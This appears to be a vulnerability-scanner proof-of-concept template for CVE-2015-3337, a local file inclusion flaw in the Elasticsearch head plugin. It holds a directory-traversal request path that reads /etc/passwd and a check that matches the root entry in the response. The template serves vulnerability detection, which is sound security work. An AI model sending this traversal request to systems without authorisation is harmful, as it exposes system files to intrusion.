name: poc-yaml-elasticsearch-cve-2015-3337-lfi
rules:
  - method: GET
    path: /_plugin/head/../../../../../../../../../../../../../../../../etc/passwd
    expression: |
      response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)

detail:
  author: X.Yang
  links:
    - https://github.com/vulhub/vulhub/tree/master/elasticsearch/CVE-2015-3337